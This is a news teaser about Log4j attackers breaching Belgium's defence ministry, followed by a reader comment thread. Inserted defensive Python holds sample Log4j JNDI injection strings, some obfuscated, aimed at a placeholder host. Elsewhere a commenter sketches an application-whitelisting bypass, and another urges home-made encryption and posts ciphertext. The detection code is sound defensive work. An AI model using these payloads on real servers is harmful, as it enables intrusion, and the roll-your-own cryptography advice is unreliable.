Belgian defence ministry admits attackers accessed its computer network by exploiting Log4j vulnerability

The Belgian Ministry of Defence has suffered a cyber attack after miscreants exploited one of the vulnerabilities in Log4j. The attack marks the first occasion that a NATO country's defence ministry has fallen victim to the flaws. The attack took place last week, as reported by Flemish-language TV news station VRT, which said …

  1. Filippo Silver badge

    XKCD puts this nicely: https://xkcd.com/2030/

    The entire field of computer engineering is fundamentally broken. This kind of crap is going to keep happening, and in the future it might get anywhere from mildly better to horribly worse.

    But getting rid of malware would require rebuilding everything from scratch, from apps down to firmware, possibly the silicon too, using an entirely different model of how things are done. Developing in such an environment would be a full order of magnitude more costly, and some features would be outright unfeasible. I don't see this happening.

    1. Clausewitz 4.0
      Devil

      You are... right !!! Code runs on rockets, DHS computers, nuclear silos. All it takes is to find a vulnerability, and a way to exploit it.

      1. Tom Paine

        Ggl “red Molotov more complicated”.

    2. Anonymous Coward
      Anonymous Coward

      But getting rid of malware would require rebuilding everything from scratch, from apps down to firmware, possibly the silicon too, using an entirely different model of how things are done.

      Getting rid of malware is actually pretty simple. Instead of allowing any software to run, and then running software to scan for known viruses, simply specify what *should* be running and block everything else. You can do that at the moment in about ten minutes even on Windows (google software restriction policy or applocker policy; these are group policy objects available free of charge out of the box). That takes care of the Windows endpoints; Linux ones will probably already be aware of SELinux.

      Then put access to your network behind a VPN secured with 2FA and then be paranoid with your incoming firewall rules. And splash £10 a month to host your website with a random web host instead of saving money and hosting it yourself; if it gets hacked then you're able to just shrug and wipe and FTP the replacement back up with no further damage to yourself.

      Hey presto, you have 95% of the benefits at 0% of the cost, and it's available now.

      1. ThatOne Silver badge
        Unhappy

        > simply specify what *should* be running

        You're kidding? In those days when everybody and his dog demands to freely run his stuff on my computer/phone ("for my convenience" of course), and otherwise perfectly sane people think "web apps" are cool?

        Seriously, I totally agree with you, and software restriction has saved my hide in the past, but it's so totally against the current zeitgeist that it becomes impossible, except on dedicated, single-task devices. Heck, nowadays people can't even prevent Windows from spying on them... As the most extreme example take the smartphone, where the user is just a powerless guest with no control whatsoever, only able to play with the colored buttons in his playpen.

        Yes, yes, I'm running Linux, mostly for that reason, but it's no silver bullet either. Here too, regrettable drifts are slowly starting to surface over time.

        1. cyberdemon Silver badge
          Devil

          Re: I'm running Linux ... Here too, regrettable drifts are slowly starting to surface over time.

          Docker, Snap, Flatpak, Electron, SystemD ... Java ... ".NET for linux" .. WASM

          To name but a few.

          And every time I run NPM or PIP I think "oh god, what did I just download and run"

          If there's one thing that the opening scenes of Battlestar Galactica ought to have taught us, it's that cybersecurity is impossible when all of our systems are (tightly) interconnected or centralised.

          But if we isolated our systems to make them do their job AND ONLY their job, then how would the Big Tech companies get our data?

      2. DS999 Silver badge

        If only it were that simple

        The fact that it has been possible to exploit something like an iPhone that only runs signed code - even without installing ANY apps besides the default ones - proves that your scheme won't "get rid of malware" but only raise the bar for exploit.

        When you have companies willing to design a virtual 64 bit CPU from OR/XOR etc. made possible via bitwise operations possible in JBIG2, like NSO Group did to exploit the iPhone and enable spying on dissidents and journalists, you might stop the average script kiddie but you won't stop those with sufficient profit motive.

        Until paying of ransom for ransomware exploits is banned, a sufficient profit motive will remain for bad guys to devote a ton of effort to exploits. Maybe not quite NSO Group level of effort but enough to keep ransomware in business. Take away the profit motive, or at least the easy profits of ransomware (you will always have those looking to steal secrets for financial or political gain) and the bar you set with your scheme will be high enough to stop 98% of incidents.

        Though you still have the problem of who is to sign all the code that's running on your system. If you do it in house, there will probably be exploitable cracks in the procedure. You can fall back on having Microsoft do it for Windows, but who does it for Linux? If it is like getting SSL certs then even the supposedly "trusted" have been fooled too many times, so who says they wouldn't be for software signing?

      3. Justthefacts Silver badge

        And that would precisely *not* work

        The Log4j vuln shows how that precisely *doesn't* work in the modern world.

        The logging vuln works within the JVM, which is an allowed and expected process on the machines it’s running on. It loads Java data/code from elsewhere, but from the outside there’s nothing unusual about what it is doing - other than a blip of unexpected network traffic. Your proposal might mitigate the maximum level of pwnage privilege escalation, but that’s all.
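The two detection angles raised in this post (the lookup arriving inside otherwise ordinary log data, and the "blip of unexpected network traffic" when the JVM reaches out) can both be checked mechanically. The following is an added example written for this page, not code from the article or from any commenter: it normalises the nested lookup forms that Log4j 2's own lookup syntax resolves (`${lower:...}`, `${upper:...}` and the `:-` default form) before looking for a JNDI lookup, and it flags outbound connections from an application server that are not on a per-host egress allow-list. The log lines, connection records and allow-list are constructed for the example.

```python
import re

# Constructed access-log lines for this example (not from the article or any real incident).
# Lines 1-3 carry a JNDI lookup in the User-Agent field, two of them using nested lookups
# to hide the word "jndi"; line 4 contains an innocent "${...}" that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - "GET /api HTTP/1.1" 200 "${${lower:j}ndi:${lower:r}mi://example.invalid/b}"',
    '10.0.0.3 - - "GET /x HTTP/1.1" 404 "${${::-j}${::-n}${::-d}${::-i}:dns://example.invalid/c}"',
    '10.0.0.4 - - "GET /y HTTP/1.1" 200 "price is ${amount} dollars"',
]

# Lookup forms that Log4j 2 resolves itself and that are used to obscure the literal "jndi".
_LOWER = re.compile(r"\$\{lower:([^{}]*)\}", re.I)
_UPPER = re.compile(r"\$\{upper:([^{}]*)\}", re.I)
_DEFAULT = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")  # ${::-x} and ${env:NAME:-x} both yield "x"


def normalize(text, max_rounds=10):
    """Collapse nested lookup syntax, innermost first, until the text stops changing."""
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s:]+)", re.I)


def find_jndi_lookup(line):
    """Return (scheme, host) if the line carries a JNDI lookup after normalisation, else None."""
    m = _JNDI.search(normalize(line))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan_log(lines):
    """Return [(line_index, scheme, host)] for every line that carries a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines):
        found = find_jndi_lookup(line)
        if found:
            hits.append((n, *found))
    return hits


# Constructed outbound-connection records from an application server: (process, dst_host, dst_port).
# Only the database and the forward proxy were ever provisioned as destinations.
SAMPLE_EGRESS = [
    ("java", "db.internal", 5432),
    ("java", "proxy.internal", 3128),
    ("java", "example.invalid", 389),  # an LDAP connection nobody provisioned
]
ALLOWED_EGRESS = {("db.internal", 5432), ("proxy.internal", 3128)}


def unexpected_egress(records, allowed=ALLOWED_EGRESS):
    """Return the connection records whose destination is not on the allow-list."""
    return [r for r in records if (r[1], r[2]) not in allowed]


if __name__ == "__main__":
    for idx, scheme, host in scan_log(SAMPLE_LOG):
        print(f"line {idx}: JNDI lookup via {scheme} to {host}")
    for proc, host, port in unexpected_egress(SAMPLE_EGRESS):
        print(f"unexpected egress: {proc} -> {host}:{port}")
```

The egress check is the more robust of the two, which is the point the post makes: an application server that has no business opening LDAP, RMI or DNS connections to arbitrary hosts gives you a signal that does not depend on recognising every obfuscation of the lookup string.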

        1. Anonymous Coward
          Anonymous Coward

          Re: And that would precisely *not* work

          It would be very unusual for an application server to make a connection to a host on the internet, if it was running behind a reverse proxy, as most tend to be.

          1. Anonymous Coward
            Anonymous Coward

            Re: And that would precisely *not* work

            What does the proxy have to do with the query destination? I don't understand, do you mean you've set up NGINX to make random pings for no reason? Just to keep it in shape with "on the hustle"? Marco... poor thing.

            Regardless, having one thing connect to another thing on behalf of that other thing is exactly how a network works (although if we're going back to flying pigeons, I have an offer for you).

          2. Tom Paine

            Re: And that would precisely *not* work

            For some value of “few”.

        2. Tom Paine

          Re: And that would precisely *not* work

          When it comes to Infosec, very little works in the modern world.

      4. Anonymous Coward
        Anonymous Coward

        "Behind a VPN"

        What do you mean "behind a VPN"?

        That makes sense if you've got remote workers dialling in- give them a secure channel to connect to. But there must be an underlying network for that VPN to travel over.

        And if you just mean "subscribe to a VPN service and route all traffic through that" you're seriously misinformed. That VPN gives you a really secure line to the computer of someone else, after which you have no idea what happens. They could MITM you, they could serve up old copies of pages, they could log all of your traffic and crack the interesting bits later. 2FA does bugger all with this too- once it reaches the VPN company it's decrypted before being retransmitted.

        VPN is ONLY a security feature if you're going between two trusted endpoints and don't trust the transport layer. It is not some sort of magical encryption- or even onion-routing traffic-obfuscation- system.

        They may be a good option on public WiFi- you trust the VPN provider more than you trust the essentially-open network.

        But for fixed office or home networks, they're good for faking your location to Netflix and that's about it.

    3. Doctor Syntax Silver badge

      This particular problem seems to be the result of creeping featurism. Eliminating that would be a good idea. Did someone say "Do one thing and do it well"?

      1. FuzzyTheBear
        Big Brother

        Old school.

        That "do one thing, do it well" is a long forgotten base of how we did things in the past. Every piece of software now wants to take over the universe, and the universe + cat takes over said software. Sad, but everyday people are not computer literate. They can use but do not understand what goes on under the hood. If they really knew, or cared, they wouldn't be using Microsoft .. or Google Chrome, or Apple .. in fact they would be scared sh**less of computers.

        1. Doctor Syntax Silver badge

          Re: Old school.

          That "do one thing, do it well" is a long forgotten base of how we did things in the past.

          Exactly. What could possibly go wrong?

        2. Tom Paine

          Re: Old school.

          It’s not the everyday people’s fault; it’s their management and their org’s Board of directors.

    4. Gene Cash Silver badge

      So if "computer engineering is fundamentally broken" what's your solution, other than "do it different"?

      I'm serious, we need all the help we can get.

      I see it's a basic consequence of the fact that every time we write an application, we're mostly doing something completely new, that hasn't been done before, under tight time and resource constraints.

      I've seen dozens of major coding methodologies in my life. Flowcharting everything. Gotos are bad. Structured programming. Top-down design. Functional programming, Object-oriented. Pair coding. Agile. Copying from stackoverflow.

      People are (mostly) doing their best, but programming is hard and irreducible complexity is irreducible.

      1. Jimmy2Cows Silver badge

        From personal experience of 24 years as a developer, a few things that might help:

        Allow developers to choose the best languages and tools for the job, instead of mandating particular solutions just because they happen to be in vogue. Old doesn't mean bad.

        Following on from above, don't constantly switch language with every change in the wind.

        "Agile" is not the solution to every problem. If, as a business, you're going to "do agile", take the time to fully understand what it means - don't just read the Agile Manifesto, don't pay lip-service while resolutely resisting any actual change to development practices, and absolutely do not see it as a silver bullet that will magically solve all problems.

        Give sufficient time to design and develop a proper solution without scope creep.

        Listen to your devs when they say something won't work, is a poor choice etc. They usually know what they're talking about.

        Test continuously, as a mandatory part of the development process, not just a tacked-on afterthought that can be dismissed if it seems too expensive or clashes with a pre-ordained release schedule.

        Let development be managed by people who actually know what they're doing, instead of MBAs that know jack shit about programming.

        Of course, there's loads more depending on your personal experience.

        1. Boris the Cockroach Silver badge
          Boffin

          Quote

          "As computer systems get more and more complex we have to rely more and more on pre-existing solutions. It is not reasonable for me to have to re-invent a trace/logging system every time I start a new project."

          This is exactly what us engineering types faced in the 18th/19th century: no common standard for a screw thread, so you ended up with manufacturers making their own... then charging through the nose if the bolt failed on their machine (and god help you if the machinist had taken it into his head to make his own bolt/thread to fit).

          Whitworth solved that with a standard threadform, so that anyones nuts would fit on anyones bolts (made himself a fortune in the process)

          In software, I want to take a proven module, stick it into my project while knowing the inputs and outputs, and then worry about the code I'm designing. However, what is happening is that people are taking a module into their projects.... then finding out just after delivering their projects that the people behind a proven module have just updated it and put in a bug. Rather like our engineering designers specifying a 12mm by 1.75mm pitch standard metric bolt that can resist a 10 ton load, then finding that the bolt designers have changed it to M12 by 2.5mm pitch and it can only take 7 tons as a result.

          It's not surprising to me that software fails so often.... it's more surprising that it works, to be honest.

          And the habit of pulling in stuff from the web to run your website... jeez...... would you fly on an aircraft us engineers just grabbed a bunch of bits that happened to look like they fit?

          If you want software to work reliably, repeatedly and without flaws, you will have to adopt engineering practices in order to create the software, which takes time and money. And as always you can have 2 out of the following three options: delivery, quality, price.

          1. Doctor Syntax Silver badge

            One thing that might help would be to have a practice of publishing a series of unit tests with the module that it must pass. The unit tests may be added to but not changed or removed.

            A business could then adopt a rule of only using external projects that follow this practice, that the version used passes the tests and possibly running some sort of acceptance review that the tests are sufficient.

            A further rule would be to not use the library in a way that isn't covered by the tests nor depend on some such side-effect. If, for instance, there was no test for use after free then this should not be used even if it were found to work; the implementation might be changed and/or a test introduced in a subsequent release.

            In essence this solves the problem posed in TMMM: is the product defined by the spec or the initial implementation? It's neither, it's defined by the tests and something not covered in the tests is not part of the specification and not to be relied on to remain unchanged.

            1. Justthefacts Silver badge

              That wouldn’t have solved this problem…..

              An additional feature (the JNDI of Log4j) would have just been an additional unit test.

              It would still have passed all the old unit tests.

              Unless you already knew about JNDI, there’s no way you could have guessed an attack vector that showed why the updated item was insecure.

              This demonstrates why the Continuous Integration mantra is Just Another Trendy Thing, but can't bring the benefits it claims.
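The adoption rule proposed by Doctor Syntax above (tests ship with the module and may be added to but never changed or removed) is easy to enforce as a gate, and the objection Justthefacts raises is equally easy to demonstrate against it. The block below is an added example for this page, not code from either commenter or from any real project: it fingerprints each published test, classifies a candidate release's tests as added, changed or removed, and accepts only releases that add. The three test sets are constructed for a hypothetical logging module; `fmt`, `lookup` and `resolve` inside the test strings are placeholders and are never executed.

```python
import hashlib


def digest(source):
    """Stable fingerprint of one test's source text."""
    return hashlib.sha256(source.encode("utf-8")).hexdigest()


def build_manifest(tests):
    """Map each test name to the digest of its source; this is what ships with the module."""
    return {name: digest(src) for name, src in tests.items()}


def compare_manifests(published, candidate):
    """Classify the candidate's tests as added, changed or removed relative to the published manifest."""
    added = sorted(set(candidate) - set(published))
    removed = sorted(set(published) - set(candidate))
    changed = sorted(name for name in published
                     if name in candidate and published[name] != candidate[name])
    return {"added": added, "changed": changed, "removed": removed}


def acceptable(published, candidate):
    """The rule from the thread: a release may add tests but must not change or remove any."""
    diff = compare_manifests(published, candidate)
    return not diff["changed"] and not diff["removed"]


# Constructed test sources for a hypothetical logging module (placeholders, not real tests).
V1_TESTS = {
    "test_format_message": "assert fmt('hello %s', 'x') == 'hello x'",
    "test_message_is_not_interpolated": "assert fmt('%s', '${x}') == '${x}'",
}
# v2 adds a lookup feature and only adds a test for it. Every old test still passes and the
# gate accepts the release: exactly the objection raised above.
V2_TESTS = dict(V1_TESTS, test_lookup_resolves="assert lookup('${x}') == resolve('x')")
# v3 rewrites an existing test to match changed behaviour; the gate rejects this release.
V3_TESTS = dict(V2_TESTS,
                test_message_is_not_interpolated="assert fmt('%s', '${x}') == resolve('x')")


if __name__ == "__main__":
    published = build_manifest(V1_TESTS)
    for label, tests in (("v2", V2_TESTS), ("v3", V3_TESTS)):
        print(label, "accepted" if acceptable(published, build_manifest(tests)) else "rejected",
              compare_manifests(published, build_manifest(tests)))
```

The gate guarantees that behaviour you already rely on (everything covered by a published test) cannot silently change under you; it says nothing about behaviour that only new tests cover, which is where a newly added feature lives.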

              1. spireite Silver badge

                Re: That wouldn’t have solved this problem…..

                It's only ever as good as the tester wrote.

        2. DS999 Silver badge
          Thumb Down

          What?

          Allow developers to choose the best languages and tools for the job, instead of mandating particular solutions just because they happen to be in vogue. Old doesn't mean bad.

          So one guy programs in C because he's always used it and thinks it is great for his project no matter what his project is. Another uses C++, another uses Java, another uses Rust, and some guy you just hired from the defense industry uses Ada.

          Then you have some layoffs and suddenly the Java and C guys have to support the Ada, C++ and Rust code.

          The reason companies specify a language/tools is to reduce complexity. Letting developers choose what they want only works if no one else is ever going to need to look at their code, which just isn't realistic unless you are developing phone apps where one guy builds something, it is released, and if he leaves you can drop support for it because you've probably made most of the money you're ever going to see from it already anyway.

          I agree not changing with every fad is a good thing, maybe you reevaluate once a decade, but you should never standardize on more than a couple of languages at once unless there are some highly extenuating circumstances (like developing for something ancient that thinks Fortran 77 is the latest trend, or developing for the web where you are pretty much forced to use JavaScript).

          1. martinusher Silver badge

            Re: What?

            >The reason companies specify a language/tools is to reduce complexity.

            But they don't. Applications code is typically tied to a vendor, not a toolset, and the vendor's business plan is to continually update their toolsets and platforms, obsoleting previous versions of the toolset. This leads to a situation where you have to trust the vendor's toolsets implicitly because you can't devote enough time to completely testing complex products every revision cycle.

            Until relatively recently this has characterized the difference between embedded and applications code. Apps people are always pushing "the latest", often citing quite spurious reasons for changing (it's never "because it will enhance my resume", it's usually something like "security"). Embedded by necessity is more conservative. The apps rot is gradually spreading to embedded work, though, and has also started to infect Linux.

            The fundamental problem is that software doesn't wear out. This is why malware has been such a boon to the industry (if I didn't know better I'd swear that a lot of it is being written by divisions of major vendors in order to justify the update/obsolescence cycles).

        3. Justthefacts Silver badge

          Or the opposite

          Build up a set of peer-reviewed *libraries* to industry *standards*. Get lots of eyes on the libraries, to be signed off and never ever changed. And have software engineers be certified to use *only those libraries* and not just anything from a random org that they like. Professional institution, basically, like civil engineering. You think civil engineers specifying materials for a bridge get to just decide what they feel comfortable with?

        4. spireite Silver badge

          Agile, I've worked in enough places to recognise some main things...

          1. It's not the answer to most problems. Primary reason being that the projects usually link to some archaic/older code in the chain where changes to that cannot be broken down into bite size chunks. It's like the net, it's only as fast as its slowest link.

          2. Everywhere I've worked, it starts off as it should then quickly decreases into a bunfight where you end up with a waterfall, in an 'Agile context'.

          Now you could argue that's a management issue, which is right - to a point - but getting past point 1 is usually an unachievable hurdle. Agile works if there are no dependencies outside the project. If it's sandboxed, great.... if not, you're screwed.

          Some time ago, I was asked to do some API work, and was directed to use what I was comfortable in... but then told to use Go or Rust when my background was more 'classic'. I'd never touched Rust or Go before anyway.

          What should drive these decisions is what experience and language knowledge is in the team. It shouldn't be a whim, based on it being 'flavour of the month'

        5. stiine Silver badge

          I won't downvote you, but instead suggest that you don't allow programmers to use their favorite language, unless you've hired all of your programmers with criterion #1 being 'your favorite language must be x' where 'x' is the source language of all of your applications. I'm not going to suggest that you can't change this language or have two, but having every application written in a different language will turn out to be more expensive than good programmers.

          1. KSM-AZ

            A good programmer...

            Can write programs. There is ramp up time to whatever language you are writing, but I've found that almost all programming languages have the same constructs. There are some oddities that handle operations strangely (postscript, lisp?, forth) but they pretty much all have the concept of data stored in memory, operators, if-then-else, while loops, input and output. I understand I'm not writing in C much any more, and RPG-II, III, Free, COBOL are more record and linear oriented; I don't miss them much either, but I'm failing to see any huge advantage in Python (apparently columns are important again, and I need an SEU template), I just don't care for the syntax, and the need for RUST is just escaping me. I moved from C to PHP for most things, and I tend to weld a bit of logic in PL/PGSQL. Java has never really tripped my trigger; it's always seemed to me to be a language with a library (class, whatever) for pretty much anything, that always delivers disappointing performance, and usually leaks memory if it runs for any length of time.

            Back in the day . . . There was a full blown accounting program, double entry, reports, etc, written using Bourne shell, and standard system tools: sort, sed, awk, ... Code was pretty legible. I'm sure someone will enlighten me to the huge advantages of RUST and Python.

        6. Tom Paine

          Agile hasn’t helped security, but don’t kid yourself that finding a new methodology - or reverting to waterfall or wtvr - would solve the problem.

      2. EnviableOne

        Start with the OWASP top 10 - it's barely changed since 2010.

        Remember the phrase "if it's worth doing, it's worth doing right" and don't cut corners. All methodologies must do everything, i.e. don't drop testing documentation or security, cos agile.

        Do it securely from the start. It might take longer or more thought, but it's a pain to fix later (as log4j are finding out) and usually bottlenecks the whole thing.

        1. ayay

          I do agree with you.

          Still, more often than not, we (as an industry) get away with it.

          The beancounters are playing the odds. They win, we lose. And so it goes.

      3. Tom Paine

        What makes you think there IS a solution?

        *clink

        *cheersh!

    5. Potemkine! Silver badge

      It's much easier to build a plane using decade old technologies than making the web run safely, which relies on 7 technological layers, each one having its own vulnerabilities, several of them evolving constantly - and don't start with me about layer 8, the worst of them all.

      The complexity of IT is several orders of magnitude that of common devices, with maybe the exception of rockets, which explode from time to time. It's beyond human possibility to have a totally safe ecosystem, even if we go back to the Intel 4004 with I/O limited to keyboard and screen.

      1. TheMeerkat

        “ with maybe the exception of rockets”

        Compared to a plane, rockets are simple. You shoot the rocket once; you have to make a plane fly for years.

        1. Anonymous Coward
          Anonymous Coward

          Unless it's a 737 Max...

        2. stiine Silver badge

          Unless it's a Falcon 9 first stage booster that's now completed 11 successful flights.

        3. David 132 Silver badge

          You shoot the rocket once, you have to make a plane fly for years.

          For some reason there's a Tom Lehrer ditty about Werner von Braun that comes to mind here!

      2. Brewster's Angle Grinder Silver badge
        Flame

        Computer programming is basically sitting on a controlled combinatorial explosion. Mostly you go in the expected direction of travel. Occasionally some of the combinations set fire to your trousers.

    6. AndrueC Silver badge
      Meh

      But this is fundamentally how humans advance. Almost everything is just an older idea better wrapped or used differently. If we had to reinvent everything every single time we'd never get anywhere.

      Worth looking at this documentary series.

      True 'blue-sky' inventions are uncommon.

      As computer systems get more and more complex we have to rely more and more on pre-existing solutions. It is not reasonable for me to have to re-invent a trace/logging system every time I start a new project. Whether it's truly new or I'm just joining an established team there is far too much value in me being able to say 'Oh yes, I know that package'. The cost of me having to learn a proprietary library or help develop it is unreasonable for most projects.

      The answer is not to shy away from utilising external code. The answer is to learn how to do so safely.

    7. Anonymous Coward
      Anonymous Coward

      XKCD puts this nicely: https://xkcd.com/2030/

      Actually, it's more like https://xkcd.com/2347/

      More and more software depends on some random library someone brought into the project often just because it was simpler than writing a few lines of code.

      In turn fewer and fewer languages come with their own extensive libraries, relying on FOSS to cover their lack of investment - without any real involvement, validation, testing, and funding of that code. It's a "we're using it because everybody else does".

      The corollary is that a dangerous bug in a SINGLE library can hit a huge number of systems.

      1. Androgynous Cupboard Silver badge

        Re: XKCD puts this nicely: https://xkcd.com/2030/

        You have a tendency to write things I disagree with, but not this time. Absolutely spot on.

      2. vogon00

        Re: XKCD puts this nicely: https://xkcd.com/2030/

        I just wrote some words on this subject. Your '2347' picture is way better:-)

    8. EnviableOne

      i see your XKCD

      and raise you

      https://xkcd.com/2347/

      replace Nebraska with Australia, and you have Log4j

    9. vogon00

      Re:The entire field of computer engineering is fundamentally broken

      The entire field of computer engineering is fundamentally broken

      Possibly. If so, it's down to

      • The ever-increasing hubris among those (Commercial and Engineering) involved.
      • The ever-reducing amount of time available for the work (Time is money).
      • The reliance on other people's libraries (which people don't bother to check or update).
      • The simply ridiculous complexity involved.

      OK, using libraries is a given - we can't write ALL our own code from scratch - but FFS review your own code, or better have a proper peer review.

      [Ende]

    10. Tom Paine
      Facepalm

      Concur

      This, plus the generally cynical disinterest in security at most orgs*, is one of the main reasons I burned out after 20y in the trade.

      * the ones prepared to employ me, anyway; obvious risk of sample bias... tho the list of employer logos branded onto my flesh includes some huge and systemically significant orgs. US mega bank, .org handling thousands of public and private sector megacorps’ data, fin servs big wheels.

  2. Anonymous Coward
    Anonymous Coward

    It's taken them seven years....and they decided the previous hack was on the wrong Belgians!!!

    Link: https://theintercept.com/2014/12/13/belgacom-hack-gchq-inside-story/

  3. herman

    Mandatory Access Control

    SELinux, AppArmor and Tomoyo are mandatory access control systems that stop these kind of intrusions effectively. Windows also has MAC but the implementation is flawed so it is not used.

    1. Clausewitz 4.0
      Devil

      Re: Mandatory Access Control

      I did a pentest once in an ATM with EXE restriction in place. Only certain EXE could run in the system, not one from my tools.

      I had the exploit, so I recoded my tool to run as a DLL via rundll32.

      As said, EXE restriction is only for specialized systems, and it is not a foolproof solution.

  4. Anonymous Coward
    Anonymous Coward

    Apache Server

    What really surprises me is that a major mistake of the piece has not yet been identified, never mind corrected: assuming the software referred to in the article as Apache Server means the widely known/used HTTP server, the claim that this software has a log4j dependency is of course incorrect. As the source code consists of plain C and not Java, it has its own logging functionality and is thus not susceptible to the vulnerability commonly known as "log4shell".

  5. Version 1.0 Silver badge
    Happy

    Well at least they know that the network and data were accessed - it would be much worse if they didn't know that this had happened.

  6. johnnyblaze

    AAS is a big problem

    We're running a very slippery slope with anything delivered 'as a service' too. It's often shipped unfinished and not fully tested - the premise being 'ship it now, fix it later'. Between those two points though, millions could have installed it and be suddenly vulnerable. We are truly walking into a security tsunami with our eyes fully open!

  7. well meaning but ultimately self defeating

    Belgian has a defence ministry?

    This is the biggest piece of news in the article.

    1. Fruit and Nutcase Silver badge

      Re: Belgian has a defence ministry?

      They have retained Hercule Poirot to go after the miscreants

      1. David 132 Silver badge

        Re: Belgian has a defence ministry?

        ...aided by Tintin?

  8. Jaywalk

    Kudos

    Kudos to Belgian Defense Ministry! They know that they have been hacked. For many ignorance is bliss :)

  9. Hans 1
    Paris Hilton

    The whole problem we face, me included: management sees nice and shiny, they say we want shiny, I say OK, but I can make nice and shiny as well since we have in-house now, why shift? They say others have done the heavy lifting and this is nice and shiny; you end up with nodejs.

    You install a plugin that depends on 800 dependencies, you have to make sure, all 800 are safe, good luck.

    The other problem, you have one company that can do just as well, proprietary code, 1 is better than 800, you think, but proprietary means you are at the mercy, nobody can check, what could go wrong, someone finds something, you are at the mercy of propriety code vendor, who releases updates every other month that once installed require 3 reboots and break some shit. There, go and ask proprietary code vendor to fix y for you, just ... for you, you cannot fix it, you have no source access.

  10. Anonymous Coward
    Anonymous Coward

    No...it's not "shiny"....and it's not "proprietary vs. open source".........

    @Hans_1

    Link: https://www.businessinsider.com/solarwinds-hack-explained-government-agencies-cyber-security-2020-12?r=US&IR=T

    Link: https://www.npr.org/2021/04/16/985439655/a-worst-nightmare-cyberattack-the-untold-story-of-the-solarwinds-hack?t=1640825606542

    Link: https://www.infoworld.com/article/2608141/snowden--the-nsa-planted-backdoors-in-cisco-products.html

    No...it's not "shiny"....and it's not "proprietary vs. open source".........it's actually quite simple....."Who do you trust?"

    How about NOBODY!

    How about doing YOUR OWN ENCRYPTION (both for static data and for all data in transit)? Yup....no third party software......do it yourself! Buy a copy of Bruce Schneier's book "Applied Cryptography".......fire up your C compiler.......and just get started! Read up on Diffie/Hellman. Oh...and stay away from all that public key stuff.....stay away from the "end-to-end encryption" claims....it's all been hacked already by the folk in Fort Meade.

    That way, the hackers (when they eventually get in....and they will)....the hackers will have your own private encryption to worry about!....maybe they will just move on to an easier target!

    Here's a message -- triple encrypted in an unpublished private cipher -- as an example of what can be done.

    *

    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

